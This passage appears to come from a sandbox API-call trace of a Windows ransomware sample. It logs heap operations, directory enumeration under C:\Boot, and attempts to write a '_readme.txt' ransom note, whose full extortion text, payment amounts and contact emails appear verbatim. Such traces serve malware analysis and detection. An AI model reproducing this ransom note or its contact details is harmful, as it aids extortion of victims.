dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.654] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0188.654] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.655] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.655] PathFindFileNameW (pszPath="") returned="" [0188.655] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.656] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.656] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.656] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.657] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.657] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0188.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.657] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.657] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.658] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.659] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.659] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.659] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.660] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0188.660] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.661] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.661] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.662] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.662] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 